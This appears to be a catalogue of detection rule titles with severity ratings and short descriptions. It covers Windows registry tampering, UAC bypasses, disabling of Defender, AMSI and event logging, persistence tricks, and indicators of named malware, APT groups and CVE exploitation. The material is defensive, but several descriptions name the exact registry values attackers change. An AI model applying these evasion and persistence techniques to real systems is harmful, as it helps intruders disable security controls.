Allow RDP Remote Assistance FeaturemediumDetect enable rdp feature to allow specific user to rdp connect on the targeted machine
Potential AMSI COM Server HijackinghighDetects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless
New BgInfo.EXE Custom DB Path Registry ConfigurationmediumDetects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.
New BgInfo.EXE Custom WMI Query Registry ConfigurationmediumDetects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"
New BgInfo.EXE Custom VBScript Registry ConfigurationmediumDetects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"
Blackbyte Ransomware RegistryhighBlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption
Bypass UAC Using DelegateExecutehighBypasses User Account Control using a fileless method
Bypass UAC Using SilentCleanup TaskhighDetects the setting of the environement variable "windir" to a non default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
Sysmon Driver Altitude ChangehighDetects changes in Sysmon driver altitude value. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
Change Winevt Channel Access Permission Via RegistryhighDetects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.
ClickOnce Trust Prompt TamperingmediumDetects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.
Service Binary in Suspicious FolderhighDetect the creation of a service with a service binary located in a suspicious directory
Custom File Open Handler Executes PowerShellhighDetects the abuse of custom file open handler, executing powershell
Windows Defender Exclusions Added - RegistrymediumDetects the Setting of Windows Defender Exclusions
Potentially Suspicious Desktop Background Change Via RegistrymediumDetects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
Antivirus Filter Driver Disallowed On Dev Drive - RegistryhighDetects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".
Hypervisor Enforced Code Integrity DisabledhighDetects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel
Hypervisor Enforced Paging Translation DisabledhighDetects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.
DHCP Callout DLL InstallationhighDetects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
Disable Exploit Guard Network Protection on Windows DefendermediumDetects disabling Windows Defender Exploit Guard Network Protection
Disable Administrative Share Creation at StartupmediumAdministrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system
Disabled Windows Defender EventloghighDetects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
Disable PUA Protection on Windows DefenderhighDetects disabling Windows Defender PUA protection
Disable Tamper Protection on Windows DefendermediumDetects disabling Windows Defender Tamper Protection
Potential AutoLogger Sessions TamperinghighDetects tampering with autologger trace sessions which is a technique used by attackers to disable logging
Disable Microsoft Defender Firewall via RegistrymediumAdversaries may disable or modify system firewalls in order to bypass controls limiting network usage
Disable Internal Tools or Feature in RegistrymediumDetects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)
Disable Macro Runtime Scan ScopehighDetects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros
Disable Privacy Settings Experience in RegistrymediumDetects registry modifications that disable Privacy Settings Experience
Disable Windows Security Center NotificationsmediumDetect set UseActionCenterExperience to 0 to disable the Windows security center notification
Windows Defender Service Disabled - RegistryhighDetects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry
Disable Windows Firewall by RegistrymediumDetect set EnableFirewall to 0 to disable the Windows firewall
Disable Windows Event Logging Via RegistryhighDetects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel
Add DisallowRun Execution to RegistrymediumDetect set DisallowRun to 1 to prevent user running specific computer program
DNS-over-HTTPS Enabled by RegistrymediumDetects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
New DNS ServerLevelPluginDll InstalledhighDetects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
ETW Logging Disabled In .NET Processes - Sysmon RegistryhighPotential adversaries stopping ETW providers recording loaded .NET assemblies.
Enabling COR Profiler Environment VariablesmediumDetects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
Potential EventLog File Location TamperinghighDetects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting
Scripted Diagnostics Turn Off Check Enabled - RegistrymediumDetects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
Suspicious Application Allowed Through Exploit GuardhighDetects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings
Change User Account Associated with the FAX ServicehighDetect change of the user account associated with the FAX service to avoid the escalation problem.
Change the Fax DllhighDetect possible persistence using Fax DLL load when service restart
New File Association Using ExefilehighDetects the abuse of the exefile handler in new file association. Used for bypass of security products.
Displaying Hidden Files Feature DisabledmediumDetects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. This technique is abused by several malware families to hide their files from normal users.
Registry Hide Function from UsermediumDetects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)
Hide Schedule Task Via Index Value TamperhighDetects when the "index" value of a scheduled task is modified from the registry Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
Driver Added To Disallowed Images In HVCI - RegistryhighDetects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP ProtocolshighDetects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
Uncommon Extension In Keyboard Layout IME File Registry ValuehighDetects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
Suspicious Path In Keyboard Layout IME File Registry ValuehighDetects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
Internet Explorer DisableFirstRunCustomize EnabledmediumDetects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
RestrictedAdminMode Registry Value TamperinghighDetects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
NET NGenAssemblyUsageLog Registry Key TamperhighDetects changes to the NGenAssemblyUsageLog registry key. .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
Microsoft Office Protected View DisabledhighDetects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.
Trust Access Disable For VBApplicationshighDetects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.
Python Function Execution Security Warning Disabled In Excel - RegistryhighDetects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
Outlook EnableUnsafeClientMailRules Setting Enabled - RegistryhighDetects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
Uncommon Microsoft Office Trusted Location AddedhighDetects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.
Macro Enabled In A Potentially Suspicious DocumenthighDetects registry changes to Office trust records where the path is located in a potentially suspicious location
Office Macros Warning DisabledhighDetects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
MaxMpxCt Registry Value ChangedlowDetects changes to the "MaxMpxCt" registry value. MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
Potential Persistence Via Custom Protocol HandlermediumDetects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.
Potential Persistence Via Event Viewer Events.aspmediumDetects potential registry persistence technique using the Event Viewer "Events.asp" technique
Potential Persistence Via GlobalFlagshighDetects registry persistence technique using the GlobalFlags and SilentProcessExit keys
Modification of IE Registry SettingslowDetects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence
Potential WerFault ReflectDebugger Registry Value AbusehighDetects potential WerFault "ReflectDebugger" registry value abuse for persistence.
Potential Attachment Manager Settings Associations TamperhighDetects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)
Potential Attachment Manager Settings Attachments TamperhighDetects tampering with attachment manager settings policies attachments (See reference for more information)
Potential PowerShell Execution Policy TamperingmediumDetects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
PowerShell Logging Disabled Via Registry Key TamperinghighDetects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REGhighDetects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
ETW Logging Disabled For rpcrt4.dlllowDetects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
ScreenSaver Registry Key SetmediumDetects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
ETW Logging Disabled For SCMlowDetects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
Registry Explorer Policy ModificationmediumDetects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)
Persistence Via New SIP ProvidermediumDetects when an attacker register a new SIP provider for persistence and defense evasion
Tamper With Sophos AV Registry KeyshighDetects tamper attempts to sophos av functionality via registry key modification
Hiding User Account Via SpecialAccounts Registry KeyhighDetects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
Activate Suppression of Windows Security Center NotificationsmediumDetect set Notification_Suppress to 1 to disable the Windows security center notification
Suspicious Environment Variable Has Been RegisteredhighDetects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings
Potential PendingFileRenameOperations TamperingmediumDetect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.
Suspicious Service InstalledmediumDetects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
Enable LM Hash StoragehighDetects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
RDP Sensitive Settings Changed to ZeromediumDetects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
RDP Sensitive Settings ChangedhighDetects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
Old TLS1.0/TLS1.1 Protocol Version EnabledmediumDetects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.
Potential Signing Bypass Via Windows Developer Features - RegistryhighDetects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
UAC Bypass via Event ViewerhighDetects UAC bypass method using Windows event viewer
UAC Bypass via SdclthighDetects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
UAC Bypass Abusing Winsat Path Parsing - RegistryhighDetects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
UAC Bypass Using Windows Media Player - RegistryhighDetects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
UAC DisabledmediumDetects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
UAC Notification DisabledmediumDetects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
UAC Secure Desktop Prompt DisabledmediumDetects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
Wdigest Enable UseLogonCredentialhighDetects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
Execution DLL of Choice Using WAB.EXEhighThis rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
Disable Windows Defender Functionalities Via Registry KeyshighDetects when attackers or tools disable Windows Defender functionalities via the Windows registry
Winget Admin Settings ModificationlowDetects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks
Enable Local Manifest Installation With WingetmediumDetects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.
Winlogon AllowMultipleTSSessions EnablemediumDetects when the 'AllowMultipleTSSessions' value is enabled. Which allows for multiple Remote Desktop connection sessions to be opened at once. This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
Sysmon Configuration ChangemediumDetects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration
Sysmon Configuration ErrorhighDetects when an adversary is trying to hide it's action from Sysmon logging based on error messages
Sysmon Configuration ModificationhighDetects when an attacker tries to hide from Sysmon by disabling or stopping it
Sysmon Blocked ExecutablehighTriggers on any Sysmon "FileBlockExecutable" event, which indicates a violation of the configured block policy
Sysmon Blocked File ShreddinghighTriggers on any Sysmon "FileBlockShredding" event, which indicates a violation of the configured shredding policy.
Sysmon File Executable Creation DetectedmediumTriggers on any Sysmon "FileExecutableDetected" event, which triggers every time a PE that is monitored by the config is created.
ZxShell MalwarecriticalDetects a ZxShell start by the called and well-known function name
Exploit for CVE-2015-1641criticalDetects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
Fireball Archer InstallhighDetects Archer malware invocation via rundll32
Malware Shellcode in Verclsid Target ProcesshighDetects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro
NotPetya Ransomware ActivitycriticalDetects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
Potential PlugX ActivityhighDetects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location
WannaCry Ransomware ActivitycriticalDetects WannaCry ransomware activity
Ps.exe Renamed SysInternals ToolhighDetects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
Lazarus System Binary MasqueradinghighDetects binaries used by the Lazarus group which use system names but are executed and launched from non-default location
APT27 - Emissary Panda ActivitycriticalDetects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
Sofacy Trojan Loader ActivityhighDetects Trojan loader activity as used by APT28
APT29 2018 Phishing Campaign File IndicatorscriticalDetects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
APT29 2018 Phishing Campaign CommandLine IndicatorscriticalDetects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
OceanLotus Registry ActivitycriticalDetects registry keys created in OceanLotus (also known as APT32) attacks
Potential MuddyWater APT ActivityhighDetects potential Muddywater APT activity
OilRig APT ActivitycriticalDetects OilRig activity as reported by Nyotron in their March 2018 report
OilRig APT Registry PersistencecriticalDetects OilRig registry persistence as reported by Nyotron in their March 2018 report
OilRig APT Schedule Task Persistence - SecuritycriticalDetects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
OilRig APT Schedule Task Persistence - SystemcriticalDetects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
Potential Baby Shark Malware ActivityhighDetects activity that could be related to Baby Shark malware
Potential Dridex ActivitycriticalDetects potential Dridex acitvity via specific process patterns
Potential Emotet ActivityhighDetects all Emotet like process executions that are not covered by the more generic rules
Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32mediumDetects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local
Potential EmpireMonkey ActivityhighDetects potential EmpireMonkey APT activity
Equation Group DLL_U Export Function LoadcriticalDetects a specific export function name used by one of EquationGroup tools
Operation Wocao ActivityhighDetects activity mentioned in Operation Wocao report
Operation Wocao Activity - SecurityhighDetects activity mentioned in Operation Wocao report
Potential Emotet Rundll32 ExecutioncriticalDetecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL
ComRAT Network CommunicationhighDetects Turla ComRAT network communication.
CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - RegistryhighDetects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
Potential Ke3chang/TidePool Malware ActivityhighDetects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020
EvilNum APT Golden Chickens Deployment Via OCX FilescriticalDetects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report
Greenbug Espionage Group IndicatorscriticalDetects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
Winnti Malware HK University CampaigncriticalDetects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
Winnti Pipemon CharacteristicscriticalDetects specific process characteristics of Winnti Pipemon malware reported by ESET
Potential Exploitation Attempt From Office ApplicationhighDetects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)
Suspicious Computer Account Name Change CVE-2021-42287highDetects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287
Potential BlackByte Ransomware ActivityhighDetects command line patterns used by BlackByte ransomware in different operations
Potential Devil Bait Related IndicatorhighDetects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was seen common across different Devil Bait samples and stages as described by the NCSC
Potential Devil Bait Malware ReconnaissancehighDetects specific process behavior observed with Devil Bait samples
Goofy Guineapig Backdoor IOChighDetects malicious indicators seen used by the Goofy Guineapig malware
Potential Goofy Guineapig GoolgeUpdate Process AnomalyhighDetects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor
Small Sieve Malware File Indicator CreationhighDetects filename indicators that contain a specific typo seen used by the Small Sieve malware.
APT PRIVATELOG Image Load PatternhighDetects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
Suspicious Set Value of MSDT in Registry (CVE-2022-30190)mediumDetects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.
Potential Bumblebee Remote Thread CreationhighDetects remote thread injection events based on action seen used by bumblebee
Potential CVE-2023-36884 Exploitation Dropped FilemediumDetects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884
Potential COLDSTEEL RAT File IndicatorshighDetects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants.
Potential COLDSTEEL Persistence Service DLL CreationhighDetects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT
Potential COLDSTEEL Persistence Service DLL LoadhighDetects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism
COLDSTEEL RAT Anonymous User Process ExecutionhighDetects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL
COLDSTEEL RAT Cleanup Command ExecutioncriticalDetects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples
COLDSTEEL RAT Service Persistence ExecutioncriticalDetects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT
COLDSTEEL Persistence Service CreationhighDetects the creation of new services potentially related to COLDSTEEL RAT
Injected Browser Process Spawning Rundll32 - GuLoader ActivityhighDetects the execution of installed GuLoader malware on the host. GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process.
IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32highDetects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID
Potential Pikabot Hollowing ActivityhighDetects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries
Pikabot Fake DLL Extension Execution Via Rundll32.EXEhighDetects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.
Qakbot Regsvr32 Calc PatternhighDetects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
Potential Qakbot Rundll32 ExecutionhighDetects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity.
Qakbot Rundll32 Exports ExecutioncriticalDetects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
Qakbot Rundll32 Fake DLL Extension ExecutioncriticalDetects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
Rhadamanthys Stealer Module Launch Via Rundll32.EXEmediumDetects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
Rorschach Ransomware Execution ActivitycriticalDetects Rorschach ransomware execution activity
Malicious DLL Load By Compromised 3CXDesktopAppcriticalDetects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp
Potential Compromised 3CXDesktopApp ExecutionhighDetects execution of known compromised version of 3CXDesktopApp
Potential Compromised 3CXDesktopApp Update ActivityhighDetects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software
DLL Names Used By SVR For GraphicalProton BackdoormediumHunts known SVR-specific DLL names.
Diamond Sleet APT DLL Sideloading IndicatorshighDetects DLL sideloading activity seen used by Diamond Sleet APT
Diamond Sleet APT Scheduled Task Creation - RegistryhighDetects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
Lazarus APT DLL Sideloading ActivityhighDetects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
UNC4841 - Email Exfiltration File PatternhighDetects filename pattern of email related data used by UNC4841 for staging and exfiltration
UNC4841 - Barracuda ESG Exploitation IndicatorshighDetects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
UNC4841 - SSL Certificate Exfiltration Via OpensslhighDetects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.
UNC4841 - Download Compressed Files From Temp.sh Using WgethighDetects execution of "wget" to download a ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
UNC4841 - Download Tar File From Untrusted Direct IP Via WgethighDetects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
ScreenConnect User Database Modification - SecuritymediumThis detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command InjectionhighDetects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect. This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.
Potential Kapeka Decrypted Backdoor IndicatorhighDetects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges. The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection.
Kapeka Backdoor Loaded Via Rundll32.EXEhighDetects the Kapeka Backdoor binary being loaded by rundll32.exe. The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
Kapeka Backdoor Execution Via RunDLL32.EXEhighDetects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument.
Kapeka Backdoor Configuration PersistencemediumDetects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key. The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.
Lummac Stealer Activity - Execution Of More.com And Vbc.exehighDetects the execution of more.com and vbc.exe in the process tree. This behavior was observed by a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.
Potential Raspberry Robin Aclui Dll SideLoadinghighDetects potential sideloading of malicious "aclui.dll" by OleView.This behavior was observed in Raspberry-Robin variants reported by chekpoint research on Feburary 2024.
Potential Raspberry Robin CPL Execution ActivityhighDetects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. This behavior was observed in multiple Raspberry-Robin variants.
Potential Raspberry Robin Registry Set Internet Settings ZoneMaplowDetects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024. Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.
Forest Blizzard APT - File Creation ActivityhighDetects the creation of specific files inside of ProgramData directory. These files were seen being created by Forest Blizzard as described by MSFT.
Forest Blizzard APT - JavaScript Constrained File CreationmediumDetects the creation of JavaScript files inside of the DriverStore directory. Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
Forest Blizzard APT - Process Creation ActivityhighDetects the execution of specific processes and command line combination. These were seen being created by Forest Blizzard as described by MSFT.
ScreenConnect - SlashAndGrab Exploitation IndicatorshighDetects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress
Account Created And Deleted By Non Approved UsersmediumDetects accounts that are created or deleted by non-approved users.
Privilege Role Elevation Not Occuring on SAW or PAWhighDetects failed sign-in from a PAW or SAW device
Privilege Role Sign-In Outside Expected ControlshighDetects failed sign-in due to user not meeting expected controls for adminitrators
User with Privileges LogonlowDetects logon with "Special groups" and "Special Privileges" can be thought of as Administrator groups or privileges.
Remote Registry Management Using Reg UtilitymediumRemote registry management using REG utility from non-admin workstation
Terminate Linux Process Via KillmediumDetects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.
Firewall Rule Modified In The Windows Firewall Exception ListlowDetects when a rule has been modified in the Windows firewall exception list
CreateRemoteThread API and LoadLibrarymediumDetects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process
Access To Windows Outlook Mail Files By Uncommon ApplicationslowDetects file access requests to Windows Outlook Mail by uncommon processes. Could indicate potential attempt of credential stealing. Requires heavy baselining before usage
Access To .Reg/.Hive Files By Uncommon ApplicationslowDetects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups.
ADS Zone.Identifier DeletedlowDetects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
